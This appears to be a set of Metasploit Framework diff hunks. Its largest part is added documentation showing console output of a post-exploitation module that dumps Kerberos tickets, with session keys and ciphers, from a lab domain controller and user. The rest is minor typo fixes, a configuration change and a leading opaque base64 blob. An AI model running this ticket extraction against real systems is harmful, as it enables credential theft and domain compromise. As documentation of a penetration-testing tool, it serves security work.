tLtOsjj8akj/iTEx/Kgidt9rW9sZ48SgEANNEpLhR1SmtI3/0e9Lq6oh35XWTKACrkFJGEOqSeBAaHwhArH2YyskGPadY2lL1qJI0zjhipeAZu4gWD4vpf2sKSL/ksOo9sthfxVMEVfq0QSxR37mPZwYI1LOyMcCOeckLGdHdlQCO7WwnbDpToyTq7TYzn13XmX0nyRFBIN436camSwYO/xRsWkhpVQKQIRgAjl7xCBMLT8/YGYangAASjBIxiXbXOtlj9zBwBjfA36cXz2yUp7MjC2kZLYI//xZZG1VVOa9nAG8vkkyi7GrXitG/m2X5s7YOG7XyvDOoC5yS7Yti+P2jGvPiWjAOSDmlwLolHSjeSIYCKwxK5Dm/LyMtUVtJRAb702FdI7lSH8oZCxQBQs92j3PKTBIMzz2+eY4r74Nemh+zIH86M4llhELhhyz86V9Utox9iURueY32LVieRIaTXmWXCGyopENrTt+LHPShBAk+Q8P3y+SGwVGxmm/CVKFN2R7IZNFiBxw627Vhw2pjFfVDjfsRV9mAvF6Axhks2aSO5rXZNZY1xW9iEbkRI3wnVYR9zgeSILxMNjyiVZvGFSllYnRWpDOqSe4n0/xw/ytD8gAHBYveBxzMPvTHN76Kcs1MGmhpsMdMBUo2UT4eeqBP//rXnuBtneb5maz0Ak+VwDZOf8Q76gcp66FIOGlRWPxpRgaCz2ISHeJ+istqRBm8gGbfqfHAbZM2PTzyyDHROuf3LgVyfhNUt8r7eYAgDCsfKBq6bq7O/KcQaBOfQN5yAgnt6CuAjyIqFaaXlsbQZ2D5s1p4WYUjrEpywWIoTQWLbCSYSAjOz+eYv50MQ3oE43hRQtg5eT0PCVmyG30VDfZDISq3Yj0hDMu20nuVuZ2cVvzccEBNgn9SRnQyYRRZQb6w9Zgs1/VYiY2SLZjmbYAo54TNDVJyseJ3Egl3Xp8BNccUkxZomgUOwP58q7XQk8lDzi4ApJMVJ0M8THDySVBJX2sB7oNn924fzghqW+wfzsXVnI2O9aLxzYnygHyp3h7ypt83sXyMTLD4tqEZ0DvcOvCoNnvis7VN8ZvvhLADoOxpJPALc8n+q70rfCdukZQpICUhLc16Z+JZJkGdAZtmi1Um+Cwy7lmBA+IvRp+abyklx19ulv55CbU7K8NAftJUOof/MgmAre+pOmwLofZgaSu7wVQ65fBeb8bjA==
+[*] LogonSession LUID: 0x0000003e4 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Negotiate
+[*]   LogonType:             Service (5)
+[*]   LogonTime:             2023-08-23 08:32:37 -0400
+[*]   Ticket[0]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 09:32:46 -0400
+              End time: 2023-08-23 19:32:46 -0400
+              Renew Till: 2023-08-30 09:32:46 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ==
+[*]   Ticket[1]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
+        Primary Principal: DC$@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: DC$@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: b5c64f9aa85e1e31c9b17a28093bb39de235beeca53d844e10bbf4764cf7402e
+            Subkey: false
+            Ticket Length: 1006
+            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 09:32:46 -0400
+              End time: 2023-08-23 19:32:46 -0400
+              Renew Till: 2023-08-30 09:32:46 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  a5YMKhDbytSNzz+IqsxyXBURXqaCyVIpWDHu4E1wh0Q9MIVTXn163vkGYUz0X4LuxanqMXwttX8PdYI2V/Lxx6JcPzB50Jt0q4ffw0hsE/swVYEuRI8PyZl13DxE0wlGoaps9GC4l3xZM4nbqiAkPFneJQzrYgXcBWZ6ZlxJlQyGx7hOJLcsdU2KkqNOH8kRZrL/wkKNVKfHkDIkNPSkmYdSweZzuVce7v+yeNBOJpvK4odoE8ldWR6fhOGh5uSj5Fe2G+6ZG1IZREvnxMsqWQ/Ms3Os+1ZLZfH9l6sVi59MHufw98wxMFrKOBrceP0LkThwT29WXO3K3oCojYrSwLznMRKbKnUITRqzKT45a1wB/F556f4ova1GhUAmmlF7SxkGRlDuzh6c8zuKr91gaMQnzd1R95QSDl5xMP4HvWtz0N4bryhez8VbLlnUIFPdrhXtpOpp8Gp8cvEedwnmEmS7AUZyag8ohP40EgvtTXy8No8wuw0/imgIIhmRWlOvsTzUbRpoFMsNHS9h0+s6QhOyQdffMwqGea5c7inLpzJ2LofERlCvNrXVJpJ/+rkPGJasHzcnB216cFnSYuOUYzwIl9nSg1FY5jeOOOj5bcKptUuJonwldq/KJRKWq9io2bEJwOVwteBfRbz+E2KKShjWWMxS0sYhKLG1ZOUZtdLcUfwrwajexlJxM1aV48Y5yvDz7WWdxCOhNRmrjx2qmnOmbCNLgigJByqtcsUmeftfEZte5bdIWGECXOGFLsOdaLtUbW1mRPxDxHRuwTkcB4huzbtUk31pkljGDXp6LXUFOJD/IpJ3PNR6Xcf7jQ60QIkj99wT8xUHcNgJE/I9p8p5Y5EhgsY0KQOMu/OrFD0ah/VXoAl6vOS7INZXRrdVUFchBNKnRBX8aFBnIJ9pNjn1eLdGOrlpcd6HwCz9pCh9yJVs5kjxJWhOoyhOWWtNv/aghw0xPrvMTOTk8YRqe29hihpvHyMXJTKGTDvp6rkehWIC8G5/7XPcaeSuX6yKGUA6o6QaeTBLeiOHDH45AcapY12doQpxf7COrt31+U5xH6BxWwosp+I+axdf9cV63Z4lt2BToP5RZJvTIHe2gpn2trIuo40xkEQEMLKyvsI1frRG9hecUJzSXWXvTIkAwim54SY3rVcs6I6KUulNPyvXw2XVFCGSEb8XLfpl8zc3+gv7MB9Yv6T74M4rcF0guo62vQ==
+[*] LogonSession LUID: 0x00004ff91 
+[*]   User:                  MSFLAB\smcintyre
+[*]   Session:               1
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Interactive (2)
+[*]   LogonTime:             2023-08-23 08:33:18 -0400
+[*]   Ticket[0]
+[*]     TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
+        Primary Principal: smcintyre@MSFLAB.LOCAL
+        Ccache version: 4
+        
+        Creds: 1
+          Credential[0]:
+            Server: krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL
+            Client: smcintyre@MSFLAB.LOCAL
+            Ticket etype: 18 (AES256)
+            Key: 074bf82534302378dd8d8f911ddab2afbf64b32e8093e4fdd833e683e427c361
+            Subkey: false
+            Ticket Length: 1052
+            Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
+            Addresses: 0
+            Authdatas: 0
+            Times:
+              Auth time: 1969-12-31 19:00:00 -0500
+              Start time: 2023-08-23 08:33:18 -0400
+              End time: 2023-08-23 18:33:18 -0400
+              Renew Till: 2023-08-30 08:33:18 -0400
+            Ticket:
+              Ticket Version Number: 5
+              Realm: MSFLAB.LOCAL
+              Server Name: krbtgt/MSFLAB.LOCAL
+              Encrypted Ticket Part:
+                Ticket etype: 18 (AES256)
+                Key Version Number: 2
+                Cipher:
+                  oRWAAGpgwUBqsOzC3Xq8U5cNzsuFjB0ZLIgml5HqoGPgRwMtaDs9YIPNGudWsIvu+zl1aAIY6bkw3ltzW4/Ay2IuqQXKAMVnaWhTLWMNYViyPX4lUw5vrOvR6fpshI3tx46aqXNO5hnHPmNg+zAP9nKwXNG4hj3WtdCM3NMaLGShnQhvt9RnN/rEHuOQGn9Uo+3fEO01juPq9PBMJ/HGhe6dLXWFaXUc7OscSTQ5LUTlz+ABdbz2G0wCleEJPJYsQEo0tC1XDcZRcTsMkgbrAxp3H3zQGubEmX3h36Fo2H6ftYT0NsjnU1z/keylopjV6v0aRADUnqfJs+DgevOBDF0Ccy8IRsDdDVlnxr4tK7QwOvFUuIWKEPsLM2eLesNC7yJWnkDyHiFns+PNaz1PSIoD+euNRHFqW+7cPJXro3r84UcEiukKbWrMbrkg/YSQcEr9yGikNuoWSzgYCtbMsSLBRO7JasRcSNL+p4Dc3+E5r2nWRoR9bZTQM4YM72/kzoaXXnXXuPVx2krpohGMNJIHXoQ6drqCNwYcdT/tGMoCY+BLe29/PAtywGK3Hiq3HhbDnQ8t1g63b7CTssT0edrKR72Bv/YveDn3XQ1iKNM4mot+UxGVjrStJTQ6eEp1r3ZTibSvVTn3T5E1Z3ljSyHYhIa8bGlh2Ysk2St3ZEv3emDwDXvPIGovbzkqE7NYQgPlh36siynCV2SUKj1bApWA7erk7fVTyM/swH7OFa+ekZ+J88F02fanFtvrxGOhKOBfYL50UAas5o+32cqgIrPlip6JXe3BZ2fpr71mcZo4YYzUxopFYbox3FdH95HdQVG7PNg93e3+2XvnrkWEc2md+UhYacKvMMBrXzGAz1d+ea/V3Yt2EgZc1WWAWoKVCfw6RUeTQVs2pWjq7j2APjhzjAEa4s543xgmT0jIHZnfkGzTwjM5f5mhj1KeFkff98pEQX+QjjBFnaRDnIkBmzRmAyJNzxjwAhiW/RNxYNYG3UOnpmxxV443vN3wr3e+MFvBG9azFlq36iWs+2jGNUuFTdH6RECf7/tNun+DE622vI1hIaBJLAHMHzdSIt9kLTQ+OzECGjH0QNRHHibwLhyR36UHShr/ei4/PO87kKw+ZVpb0rHNcICaT80MhCIGWLlH5SErAKQe/vOkDgqeLW+keCbZfW8F7QBXc6C9kUpzUQuIII7KvLKskbgwhqPhoVV70x9vFXWG1xSFwzPJdQmDRBanyQ0xoQFhmt2MO6lMRXTpheAAL+uBJOpgYWX5GBA=
+[*] LogonSession LUID: 0x00004d345 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:33:18 -0400
+[*] LogonSession LUID: 0x00004bfb9 
+[*]   User:                  MSFLAB\DC$
+[*]   Session:               0
+[*]   AuthenticationPackage: Kerberos
+[*]   LogonType:             Network (3)
+[*]   LogonTime:             2023-08-23 08:33:17 -0400
+[*] Post module execution completed
+msf6 post(windows/manage/kerberos_tickets) > klist
+Kerberos Cache
+==============
+id   host            principal               sname                             issued                     status  path
+--   ----            ---------               -----                             ------                     ------  ----
+398  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 08:33:17 -0400  active  /home/smcintyre/.msf4/loot/20230823135453_default_192.168.159.10_mit.kerberos.cca_948767.bin
+399  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 08:33:17 -0400  active  /home/smcintyre/.msf4/loot/20230823135459_default_192.168.159.10_mit.kerberos.cca_126280.bin
+400  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 08:33:17 -0400  active  /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_341258.bin
+401  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 08:33:17 -0400  active  /home/smcintyre/.msf4/loot/20230823135505_default_192.168.159.10_mit.kerberos.cca_389858.bin
+404  192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 08:33:18 -0400  active  /home/smcintyre/.msf4/loot/20230823135509_default_192.168.159.10_mit.kerberos.cca_783228.bin
+402  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 09:32:46 -0400  active  /home/smcintyre/.msf4/loot/20230823135507_default_192.168.159.10_mit.kerberos.cca_909298.bin
+403  192.168.159.10  DC$@MSFLAB.LOCAL        krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-08-23 09:32:46 -0400  active  /home/smcintyre/.msf4/loot/20230823135508_default_192.168.159.10_mit.kerberos.cca_938606.bin
+
+msf6 post(windows/manage/kerberos_tickets) >
+```
@@ -22,7 +22,7 @@ Synopsis:

 Options:
  -r, --relative           Output relative URLs (rather than absolute)
-  -o, --output filename    Filename to save URL list to. Defautls to urls.txt.
+  -o, --output filename    Filename to save URL list to. Defaults to urls.txt.
 INFO
  exit(0)
 end
@@ -102,7 +102,7 @@ module Anemone
    end

    #
-    # Add one ore more Regex patterns for URLs which should not be
+    # Add one or more Regex patterns for URLs which should not be
    # followed
    #
    def skip_links_like(*patterns)
@@ -16,7 +16,7 @@

 == 0.4.0 / 2010-04-08

-* Major enchancements
+* Major enhancements

  * Cookies can be accepted and sent with each HTTP request.

@@ -38,7 +38,7 @@

 == 0.3.0 / 2009-12-15

-* Major enchancements
+* Major enhancements

  * Option for persistent storage of pages during crawl with TokyoCabinet or PStore

@@ -83,7 +83,7 @@ module Metasploit
          when -5001 #kFPAuthContinue
            return parse_login_response_add_send_login_count(response, {:p => p, :g => g, :ra => ra, :ma => ma,
                                                                        :password => pass, :user => user})
-          when -5023 #kFPUserNotAuth (User dosen't exists)
+          when -5023 #kFPUserNotAuth (User doesn't exists)
            return :skip_user
          else
            return :connection_error
@@ -273,7 +273,7 @@ module Metasploit
              parsed_addreses << IPAddr.ntop(address[1..4]).to_s
            when 2 # Four-byte IP address followed by a two-byte port number
              parsed_addreses <<  "#{IPAddr.ntop(address[1..4])}:#{address[5..6].unpack("n").first}"
-            when 3 # DDP address (depricated)
+            when 3 # DDP address (deprecated)
              next
            when 4 # DNS name (maximum of 254 bytes)
              parsed_addreses << address[1..address.length - 1]
@@ -2,7 +2,7 @@ module Metasploit
  module Framework
    module API
      # @note This is a lie.  The API version is not semantically version and it's version has actually never changed
-      #    even though API changes have occured.  DO NOT base compatibility on this version.
+      #    even though API changes have occurred.  DO NOT base compatibility on this version.
      module Version
        MAJOR = 1
        MINOR = 0
@@ -43,6 +43,11 @@ module Metasploit::Framework::CommonEngine
    if ActiveRecord.respond_to?(:legacy_connection_handling=)
      ActiveRecord.legacy_connection_handling = false
    end
+
+    # @see https://github.com/rapid7/metasploit_data_models/blob/54a17149d5ccd0830db742d14c4987b48399ceb7/lib/metasploit_data_models/yaml.rb#L10
+    # @see https://github.com/rapid7/metasploit_data_models/blob/54a17149d5ccd0830db742d14c4987b48399ceb7/lib/metasploit_data_models/base64_serializer.rb#L28-L31
+    ActiveRecord.yaml_column_permitted_classes = (ActiveRecord.yaml_column_permitted_classes + MetasploitDataModels::YAML::PERMITTED_CLASSES).uniq
+
    #
    # `initializer`s
    #
--- a/Show More
+++ b/Show More